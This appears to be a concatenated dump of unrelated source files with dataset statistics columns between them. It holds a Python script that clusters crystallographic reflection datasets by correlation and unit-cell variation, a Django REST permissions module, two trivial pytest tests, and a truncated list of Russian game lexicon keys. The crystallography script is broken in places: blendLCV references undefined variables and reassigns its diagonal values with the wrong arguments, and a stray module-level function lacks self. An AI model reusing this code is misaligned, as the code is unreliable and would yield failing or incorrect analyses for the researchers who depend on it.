hklFile = any_reflection_file(x)
Arrays[x]= hklFile.as_miller_arrays()
print('File %s has been loaded'%(x))
#Printing output file
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])),file=self.LogFile)
return Arrays
def writeLog(self):
"""
Writes labels and distance matrix to a plain text file
"""
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])),file=self.LogFile)
print('Correlation coefficients', file=self.LogFile)
for L in self.results:
print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
def ccPrint(self, arglist):
"""
Calculates and returns cc between input files.
Returns the matrix element for being written in the log file
"""
Array1 = self.Arrays[arglist[0]]
Array2 = self.Arrays[arglist[1]]
gen1 = (i for i,F in enumerate(self.argList) if F == arglist[0])
gen2 = (i for i,F in enumerate(self.argList) if F == arglist[1])
for x in Array1:
if x.is_xray_intensity_array():
I_obs1=x
break
for x in Array2:
if x.is_xray_intensity_array():
I_obs2=x
break
# I_obs1 = Array1[3]
# I_obs2 = Array2[3]
# #Common1, Common2 = I_obs1.common_sets(I_obs2, assert_is_similar_symmetry= False)
#print I_obs1.correlation(I_obs2, use_binning=False).coefficient()
I_ext1= I_obs1.generate_bijvoet_mates()
I_ext2= I_obs2.generate_bijvoet_mates()
try:
ExtCommon1, ExtCommon2 = I_ext1.common_sets(I_ext2, assert_is_similar_symmetry= True)
cc= I_ext1.correlation(I_ext2, assert_is_similar_symmetry= False).coefficient()
print('Calculated correlation between %s and %s'%(arglist[0],arglist[1]))
except:
cc=0
print('Calculated correlation between %s and %s'%(arglist[0],arglist[1]))
return gen1.__next__(), gen2.__next__(),sqrt(1.0001-cc**2)
def cellPrint( arglist):
HKLarrays
Array1 = HKLarrays[arglist[0]]
Array2 =HKLarrays[arglist[1]]
gen1 = (i for i,F in enumerate(self.argList) if F == arglist[0])
gen2 = (i for i,F in enumerate(self.argList) if F == arglist[1])
b1 = Array1
b2 = Array2
I_obs1 = b1[0]
I_obs2 = b2[0]
#Common1, Common2 = I_obs1.common_sets(I_obs2, assert_is_similar_symmetry= False)
uc1 = I_obs1.unit_cell().parameters()
uc2 = I_obs2.unit_cell().parameters()
a1, b1, c1 = uc1[0], uc1[1], uc1[2]
a2, b2, c2 = uc2[0], uc2[1], uc2[2]
variation = [fabs(a1-a2)/min(a1,a2),fabs(b1-b2)/min(b1,b2),fabs(c1-c2)/min(c1, c2)]
return gen1.__next__(), gen2.__next__(), max(variation)
def calcSerial(self):
print('Correlation coefficients', file=self.LogFile)
for x in itertools.combinations(self.Arrays, 2):
a, b, cc = self.ccPrint(x)
print('%s %s %s'%(a , b , cc), file=self.LogFile)
def calcAll(self):
proc = Pool(4)
a, b, cc = zip(*proc.map(self.ccPrint, itertools.combinations(self.Arrays, 2)))
L = zip(a, b, cc)
return L
class cellCalc():
def __init__(self):
self.LogFile=open('cellClusterLog.txt', 'w')
self.CurrentDir= os.getcwd()
self.argList=[]
for root, dirs, files in os.walk('.'):
directory=root.lstrip('.')
folder=self.CurrentDir+directory
if 'XDS_ASCII.HKL' in files:
self.argList.append(folder+'/XDS_ASCII.HKL')
self.Arrays= self.loadReflections()
#self.writeLog()
self.results = self.cellSerial()
#self.writeLog()
def loadReflections(self):
Arrays = {}
for x in self.argList:
hklFile = any_reflection_file(x)
Arrays[x]= hklFile.as_miller_arrays()
print('File %s has been loaded'%(x))
#Printing output file
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])),file=self.LogFile)
return Arrays
def writeLog(self):
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])),file=self.LogFile)
print('Correlation coefficients', file=self.LogFile)
for L in self.results:
print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
def ccPrint(self, arglist):
Array1 = self.Arrays[arglist[0]]
Array2 = self.Arrays[arglist[1]]
gen1 = (i for i,F in enumerate(self.argList) if F == arglist[0])
gen2 = (i for i,F in enumerate(self.argList) if F == arglist[1])
for x in Array1:
if x.is_xray_intensity_array():
I_obs1=x
break
for x in Array2:
if x.is_xray_intensity_array():
I_obs2=x
break
I_ext1= I_obs1.generate_bijvoet_mates()
I_ext2= I_obs2.generate_bijvoet_mates()
try:
ExtCommon1, ExtCommon2 = I_ext1.common_sets(I_ext2, assert_is_similar_symmetry= True)
cc= I_ext1.correlation(I_ext2, assert_is_similar_symmetry= False).coefficient()
print('Calculated correlation between %s and %s'%(arglist[0],arglist[1]))
except:
cc=0
print('Calculated correlation between %s and %s'%(arglist[0],arglist[1]))
return gen1.__next__(), gen2.__next__(),sqrt(1.0001-cc**2)
def cellPrint(self, arglist):
Array1 = self.Arrays[arglist[0]]
Array2 = self.Arrays[arglist[1]]
gen1 = (i for i,F in enumerate(self.argList) if F == arglist[0])
gen2 = (i for i,F in enumerate(self.argList) if F == arglist[1])
b1 = Array1
b2 = Array2
I_obs1 = b1[0]
I_obs2 = b2[0]
#Common1, Common2 = I_obs1.common_sets(I_obs2, assert_is_similar_symmetry= False)
uc1 = I_obs1.unit_cell().parameters()
uc2 = I_obs2.unit_cell().parameters()
a1, b1, c1 = uc1[0], uc1[1], uc1[2]
a2, b2, c2 = uc2[0], uc2[1], uc2[2]
variation = [fabs(a1-a2)/min(a1,a2),fabs(b1-b2)/min(b1,b2),fabs(c1-c2)/min(c1, c2)]
return gen1.__next__(), gen2.__next__(), max(variation)
def cellSerial(self):
print('Correlation coefficients', file=self.LogFile)
for x in itertools.combinations(self.Arrays, 2):
a, b, cc = self.cellPrint(x)
print('%s %s %s'%(a , b , cc), file=self.LogFile)
class ccList():
"""
docsting here
This class is used to calculate distances based on the cc between the datasets.
it works with a list input files from args.parser
"""
def __init__(self, Arglist):
self.LogFile=open('ccClusterLog.txt', 'w')
self.CurrentDir= os.getcwd()
self.argList= Arglist
self.Arrays= self.loadReflections()
self.results = self.calcSerial()
def loadReflections(self):
Arrays = {}
for x in self.argList:
if reader.is_integrate_hkl_file(x):
Arrays[x]= reader().as_miller_arrays(x)
else:
hklFile = any_reflection_file(x)
Arrays[x]= hklFile.as_miller_arrays()
print('File %s has been loaded'%(x))
#Printing output file
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], n[1]),file=self.LogFile)
return Arrays
def writeLog(self):
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], n[1]),file=self.LogFile)
print('Correlation coefficients', file=self.LogFile)
for L in self.results:
print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
def ccPrint(self, arglist):
Array1 = self.Arrays[arglist[0]]
Array2 = self.Arrays[arglist[1]]
gen1 = (i for i,F in enumerate(self.argList) if F == arglist[0])
gen2 = (i for i,F in enumerate(self.argList) if F == arglist[1])
for x in Array1:
if x.is_xray_intensity_array():
I_obs1=x
break
for x in Array2:
if x.is_xray_intensity_array():
I_obs2=x
break
I_ext1= I_obs1.generate_bijvoet_mates()
I_ext2= I_obs2.generate_bijvoet_mates()
try:
ExtCommon1, ExtCommon2 = I_ext1.common_sets(I_ext2, assert_is_similar_symmetry= True)
cc= I_ext1.correlation(I_ext2, assert_is_similar_symmetry= False).coefficient()
print('Calculated correlation between %s and %s'%(arglist[0],arglist[1]))
except:
cc=0
print('Calculated correlation between %s and %s'%(arglist[0],arglist[1]))
return gen1.__next__(), gen2.__next__(),sqrt(1.0001-cc**2)
def calcSerial(self):
print('Correlation coefficients', file=self.LogFile)
for x in itertools.combinations(self.Arrays, 2):
a, b, cc = self.ccPrint(x)
print('%s %s %s'%(a , b , cc), file=self.LogFile)
def calcAll(self):
proc = Pool(4)
a, b, cc = zip(*proc.map(self.ccPrint, itertools.combinations(self.Arrays, 2)))
L = zip(a, b, cc)
return L
class cellList():
"""
This class is used to calculate distances based on the unit cell variations between the datasets.
it works with a list input files from args.parser
"""
def __init__(self, Arglist):
self.LogFile=open('cellClusterLog.txt', 'w')
self.CurrentDir= os.getcwd()
self.argList= Arglist
self.Arrays= self.loadReflections()
self.results = self.cellSerial()
def loadReflections(self):
Arrays = {}
for x in self.argList:
if reader.is_integrate_hkl_file(x):
Arrays[x]= reader().as_miller_arrays(x)
else:
hklFile = any_reflection_file(x)
Arrays[x]= hklFile.as_miller_arrays()
print('File %s has been loaded'%(x))
#Printing output file
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], n[1]),file=self.LogFile)
return Arrays
def writeLog(self):
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], n[1]),file=self.LogFile)
print('Correlation coefficients', file=self.LogFile)
for L in self.results:
print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
def cellPrint(self, arglist):
Array1 = self.Arrays[arglist[0]]
Array2 = self.Arrays[arglist[1]]
gen1 = (i for i,F in enumerate(self.argList) if F == arglist[0])
gen2 = (i for i,F in enumerate(self.argList) if F == arglist[1])
b1 = Array1
b2 = Array2
I_obs1 = b1[0]
I_obs2 = b2[0]
uc1 = I_obs1.unit_cell().parameters()
uc2 = I_obs2.unit_cell().parameters()
a1, b1, c1 = uc1[0], uc1[1], uc1[2]
a2, b2, c2 = uc2[0], uc2[1], uc2[2]
variation = [fabs(a1-a2)/min(a1,a2),fabs(b1-b2)/min(b1,b2),fabs(c1-c2)/min(c1, c2)]
return gen1.__next__(), gen2.__next__(), max(variation)
def cellSerial(self):
print('Correlation coefficients', file=self.LogFile)
for x in itertools.combinations(self.Arrays, 2):
a, b, cc = self.cellPrint(x)
print('%s %s %s'%(a , b , cc), file=self.LogFile)
class blendList():
"""
This class is used to calculate distances based on the blend LCV between the datasets.
it works with a list input files from args.parser
"""
def __init__(self, Arglist):
self.LogFile=open('cellClusterLog.txt', 'w')
self.CurrentDir= os.getcwd()
self.argList= Arglist
self.Arrays= self.loadReflections()
self.results = self.cellSerial()
def loadReflections(self):
Arrays = {}
for x in self.argList:
if reader.is_integrate_hkl_file(x):
Arrays[x]= reader().as_miller_arrays(x)
else:
hklFile = any_reflection_file(x)
Arrays[x]= hklFile.as_miller_arrays()
print('File %s has been loaded'%(x))
#Printing output file
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], n[1]),file=self.LogFile)
return Arrays
def writeLog(self):
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], n[1]),file=self.LogFile)
print('Correlation coefficients', file=self.LogFile)
for L in self.results:
print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
def diagonalCell(self, a, b, angle):
cosArgument= radians(180-angle)
diag = sqrt(a**2+b**2-2*a*b*cos(cosArgument))
return diag
def blendLCV(self, arglist):
Array1 = self.Arrays[arglist[0]]
Array2 = self.Arrays[arglist[1]]
gen1 = (i for i,F in enumerate(self.argList) if F == arglist[0])
gen2 = (i for i,F in enumerate(self.argList) if F == arglist[1])
b1 = Array1
b2 = Array2
I_obs1 = b1[0]
I_obs2 = b2[0]
uc1 = I_obs1.unit_cell().parameters()
uc2 = I_obs2.unit_cell().parameters()
a1, b1, c1, al1, be1, ga1 = uc1[0], uc1[1], uc1[2], uc[3], uc[4] , uc[5]
a2, b2, c2, al2, be2, ga2 = uc2[0], uc2[1], uc2[2], uc[3], uc[4] , uc[5]
bdiag1 = self.diagonalCell(a1, b1, ga1)
bdiag2 = self.diagonalCell(b1, c1, al1)
bdiag3 = self.diagonalCell(c1, a1, be1)
bdiag1 = self.diagonalCell(a2, b2, ga2)
bdiag2 = self.diagonalCell(a2, b2, ga2)
bdiag3 = self.diagonalCell(a2, b2, ga2)
#Calculate the LCV
LCV = [fabs(adiag1-bdiag1)/min(adiag1,bdiag1),
fabs(adiag2-bdiag2)/min(adiag2,bdiag2),
fabs(adiag3-bdiag3)/min(adiag3, bdiag2)]
return gen1.__next__(), gen2.__next__(), max(LCV)
def cellSerial(self):
print('Correlation coefficients', file=self.LogFile)
for x in itertools.combinations(self.Arrays, 2):
a, b, cc = self.blendLCV(x)
print('%s %s %s'%(a , b , cc), file=self.LogFile)
class commonList():
"""
EXPERIMENTAL CODE!!!!! Do not use
This class is used to calculate distances based on the cc between the datasets.
it works with a list input files from args.parser
"""
def __init__(self, Arglist):
self.LogFile=open('Common.txt', 'w')
self.CurrentDir= os.getcwd()
self.argList= Arglist
self.Arrays= self.loadReflections()
self.results = self.calcSerial()
def loadReflections(self):
Arrays = {}
for x in self.argList:
if reader.is_integrate_hkl_file(x):
Arrays[x]= reader().as_miller_arrays(x)
else:
hklFile = any_reflection_file(x)
Arrays[x]= hklFile.as_miller_arrays()
print('File %s has been loaded'%(x))
#Printing output file
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], n[1]),file=self.LogFile)
return Arrays
def writeLog(self):
print('Labels', file=self.LogFile)
for n in enumerate(self.argList):
print('INPUT_FILE: %s %s'%(n[0], n[1]),file=self.LogFile)
print('Correlation coefficients', file=self.LogFile)
for L in self.results:
print('%s %s %s'%(L[0], L[1], L[2]), file=self.LogFile)
def ccPrint(self, arglist):
Array1 = self.Arrays[arglist[0]]
Array2 = self.Arrays[arglist[1]]
gen1 = (i for i,F in enumerate(self.argList) if F == arglist[0])
gen2 = (i for i,F in enumerate(self.argList) if F == arglist[1])
for x in Array1:
if x.is_xray_intensity_array():
I_obs1=x
break
for x in Array2:
if x.is_xray_intensity_array():
I_obs2=x
break
I_ext1= I_obs1.generate_bijvoet_mates()
I_ext2= I_obs2.generate_bijvoet_mates()
try:
ExtCommon1, ExtCommon2 = I_ext1.common_sets(I_ext2, assert_is_similar_symmetry= True)
common= ExtCommon1.size()
print('Calculated correlation between %s and %s'%(arglist[0],arglist[1]))
except:
common=0
print('Calculated correlation between %s and %s'%(arglist[0],arglist[1]))
return gen1.__next__(), gen2.__next__(), 1000/common
def calcSerial(self):
print('Correlation coefficients', file=self.LogFile)
for x in itertools.combinations(self.Arrays, 2):
a, b, cc = self.ccPrint(x)
print('%s %s %s'%(a , b , cc), file=self.LogFile)
def calcAll(self):
proc = Pool(4)
a, b, cc = zip(*proc.map(self.ccPrint, itertools.combinations(self.Arrays, 2)))
L = zip(a, b, cc)
return L
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-f", dest="structures", default= None , type=str, nargs='+', help='The list of refined structures to merge')
parser.add_argument("-u", dest="cell", default= False , action="store_true" , help='Unit cell based clustering. requires list of input files')
parser.add_argument("-c", dest="common", default= False , action="store_true" , help='Experimental class based on common reflections only')
args= parser.parse_args()
CurrentDir= os.getcwd()
if args.structures is None:
if args.cell:
print('No input specified, calculating cell distance')
print('this might take a while')
ccCalc()
correlationFile='cellClusterLog.txt'
else:
print('No input specified, calculating Correlation coefficients')
print('this might take a while')
ccCalc()
correlationFile='ccClusterLog.txt'
elif args.cell:
print("Calculating unit cell distance between specified files")
cellList(args.structures)
correlationFile='cellClusterLog.txt'
elif args.common :
print('Warning! I am using the experimental common reflections feature!')
commonList(args.structures)
correlationFile='Common.txt'
else:
print("Calculating CC between specified files")
ccList(args.structures)
correlationFile='ccClusterLog.txt'
"""Region commented out from older version.
Check that everything is still running
"""
# if args.outname:
# LogFile= open(args.outname, 'w')
# elif args.compl:
# LogFile= open('CellClusterLog.txt', 'w')
# else:
# LogFile= open('ccClusterLog.txt', 'w')
# proc = multiprocessing.Pool(processes=8)
# print('Read all input files')
# if args.compl:
# a, b, cc = zip(*proc.map(cellPrint, itertools.combinations(HKLarrays, 2)))
# print('Done!')
# else:
# a, b, cc = zip(*proc.map(ccPrint, itertools.combinations(HKLarrays, 2)))
# print('Done!')
# #Printing output file
# print('Labels', file=LogFile)
# for n in enumerate(args.structures):
# print('INPUT_FILE: %s %s'%(n[0], os.path.abspath(n[1])),file=LogFile)
# print('Correlation coefficients', file=LogFile)
# print(a)
# for L in zip(a, b, cc):
# print('%s %s %s'%(L[0], L[1], L[2]), file=LogFile)
if __name__== '__main__':
main()
| 35.585761
| 146
| 0.583303
| 2,887
| 21,992
| 4.320402
| 0.104953
| 0.047623
| 0.057725
| 0.049387
| 0.803816
| 0.780085
| 0.758278
| 0.756674
| 0.749459
| 0.747695
| 0
| 0.031073
| 0.285877
| 21,992
| 617
| 147
| 35.643436
| 0.763133
| 0.110813
| 0
| 0.82904
| 0
| 0
| 0.106545
| 0.001249
| 0.002342
| 0
| 0
| 0
| 0.016393
| 1
| 0.086651
| false
| 0
| 0.025761
| 0
| 0.168618
| 0.163934
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52eb92c85e3ad3fe38f04d132961178213c87ef9
| 3,310
|
py
|
Python
|
apps/api/permissions.py
|
wilfredinni/merken
|
f15f168f58e9391fcafeeda7ad17232fffab2a14
|
[
"MIT"
] | 5
|
2020-05-06T03:34:07.000Z
|
2022-03-25T10:05:30.000Z
|
apps/api/permissions.py
|
MaxCodeXTC/merken
|
040515e43dcc9bdcf23f51ea15b49b4d2af64964
|
[
"MIT"
] | 17
|
2019-08-28T22:10:47.000Z
|
2021-06-09T18:19:00.000Z
|
apps/api/permissions.py
|
MaxCodeXTC/merken
|
040515e43dcc9bdcf23f51ea15b49b4d2af64964
|
[
"MIT"
] | 1
|
2020-06-15T08:34:16.000Z
|
2020-06-15T08:34:16.000Z
|
from rest_framework import permissions
class IsAdminOrReadOnly(permissions.BasePermission):
"""
Custom permission to allow only admin users edit content.
"""
def has_permission(self, request, view):
# Read permissions are allowed to any request,
# so always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to staff users
return request.user.is_staff
class IsSameUserOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow logged users see and edit his own content.
"""
def has_object_permission(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions only if the logged user is the same as the object.
return obj.username == request.user.username
class IsAuthorOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow Authors of an article to edit.
"""
def has_object_permission(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the author of the article.
return obj.author == request.user
class IsAuthorOrAdminOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow Authors of an article and admins to edit.
"""
def has_object_permission(self, request, view, obj):
# Permissions allowed to staff members
if request.user.is_staff:
return True
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the author of the article.
return obj.author == request.user
class IsOwnerOrAdminOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit.
Admin users however have access to all.
"""
def has_object_permission(self, request, view, obj):
# Permissions allowed to staff members
if request.user.is_staff:
return True
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Permissions are only to the owner of the profile
return obj.username == request.user.username
class IsOwnerOrAdmin(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit.
Admin users however have access to all.
"""
def has_object_permission(self, request, view, obj):
# Permissions allowed to staff members
if request.user.is_staff:
return True
# Permissions are only to the owner of the profile
return obj.username == request.user.username
| 32.772277
| 78
| 0.679758
| 415
| 3,310
| 5.371084
| 0.183133
| 0.044415
| 0.083445
| 0.110363
| 0.847914
| 0.828623
| 0.828623
| 0.784657
| 0.76716
| 0.76716
| 0
| 0
| 0.261934
| 3,310
| 100
| 79
| 33.1
| 0.912403
| 0.42719
| 0
| 0.742857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171429
| false
| 0
| 0.028571
| 0
| 0.771429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
ead5f5f894aa2d5ed5b4703c6984737aeff1f723
| 107
|
py
|
Python
|
test_nicedice.py
|
EavesofIT/nicediceroller
|
c5d963dd967f0e481595ee24c82bbc8030f1caa7
|
[
"MIT"
] | null | null | null |
test_nicedice.py
|
EavesofIT/nicediceroller
|
c5d963dd967f0e481595ee24c82bbc8030f1caa7
|
[
"MIT"
] | null | null | null |
test_nicedice.py
|
EavesofIT/nicediceroller
|
c5d963dd967f0e481595ee24c82bbc8030f1caa7
|
[
"MIT"
] | null | null | null |
# test_with_pytest.py
def test_always_passes():
assert True
def test_always_fails():
assert False
| 15.285714
| 25
| 0.747664
| 16
| 107
| 4.625
| 0.6875
| 0.189189
| 0.351351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.17757
| 107
| 7
| 26
| 15.285714
| 0.840909
| 0.17757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0.25
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d827a731cead8fb1a0d85a92e57abcf3e4c2fb7b
| 16,484
|
py
|
Python
|
src/the_tale/the_tale/linguistics/lexicon/groups/jobs.py
|
al-arz/the-tale
|
542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5
|
[
"BSD-3-Clause"
] | 85
|
2017-11-21T12:22:02.000Z
|
2022-03-27T23:07:17.000Z
|
src/the_tale/the_tale/linguistics/lexicon/groups/jobs.py
|
al-arz/the-tale
|
542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5
|
[
"BSD-3-Clause"
] | 545
|
2017-11-04T14:15:04.000Z
|
2022-03-27T14:19:27.000Z
|
src/the_tale/the_tale/linguistics/lexicon/groups/jobs.py
|
al-arz/the-tale
|
542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5
|
[
"BSD-3-Clause"
] | 45
|
2017-11-11T12:36:30.000Z
|
2022-02-25T06:10:44.000Z
|
import smart_imports
smart_imports.all()
V = lexicon_relations.VARIABLE
KEYS = [
('JOB_NAME_PERSON_PLACE_PRODUCTION', 620009, 'Название: выполняется мастером, эффект: «производство»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «производство»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_PLACE_SAFETY', 620010, 'Название: выполняется мастером, эффект: «безопасность»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «безопасность»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_PLACE_TRANSPORT', 620011, 'Название: выполняется мастером, эффект: «транспорт»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «транспорт»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_PLACE_FREEDOM', 620012, 'Название: выполняется мастером, эффект: «свобода»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «свобода»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_PLACE_STABILITY', 620013, 'Название: выполняется мастером, эффект: «стабильность»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «стабильность»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_HERO_MONEY', 620014, 'Название: выполняется мастером, эффект: «золото ближнему кругу»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «золото ближнему кругу»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_HERO_ARTIFACT', 620015, 'Название: выполняется мастером, эффект: «артефакт ближнему кругу»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «артефакт ближнему кругу»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_HERO_EXPERIENCE', 620016, 'Название: выполняется мастером, эффект: «опыт ближнему кругу»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «опыт ближнему кругу»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_NAME_PERSON_HERO_CARDS', 620017, 'Название: выполняется мастером, эффект: «карты судьбы»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «карты судьбы»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_PRODUCTION_POSITIVE_FRIENDS', 620054, 'Дневник: работа выполнена мастером успешно, эффект: «производство», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «производство», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_PRODUCTION_POSITIVE_ENEMIES', 620055, 'Дневник: работа выполнена мастером успешно, эффект: «производство», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «производство», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_PRODUCTION_NEGATIVE_FRIENDS', 620056, 'Дневник: работа выполнена мастером не успешно, эффект: «производство», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «производство», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_PRODUCTION_NEGATIVE_ENEMIES', 620057, 'Дневник: работа выполнена мастером не успешно, эффект: «производство», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «производство», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_SAFETY_POSITIVE_FRIENDS', 620058, 'Дневник: работа выполнена мастером успешно, эффект: «безопасность», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «безопасность», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_SAFETY_POSITIVE_ENEMIES', 620059, 'Дневник: работа выполнена мастером успешно, эффект: «безопасность», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «безопасность», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_SAFETY_NEGATIVE_FRIENDS', 620060, 'Дневник: работа выполнена мастером не успешно, эффект: «безопасность», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «безопасность», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_SAFETY_NEGATIVE_ENEMIES', 620061, 'Дневник: работа выполнена мастером не успешно, эффект: «безопасность», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «безопасность», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_TRANSPORT_POSITIVE_FRIENDS', 620062, 'Дневник: работа выполнена мастером успешно, эффект: «транспорт», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «транспорт», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_TRANSPORT_POSITIVE_ENEMIES', 620063, 'Дневник: работа выполнена мастером успешно, эффект: «транспорт», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «транспорт», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_TRANSPORT_NEGATIVE_FRIENDS', 620064, 'Дневник: работа выполнена мастером не успешно, эффект: «транспорт», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «транспорт», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_TRANSPORT_NEGATIVE_ENEMIES', 620065, 'Дневник: работа выполнена мастером не успешно, эффект: «транспорт», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «транспорт», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
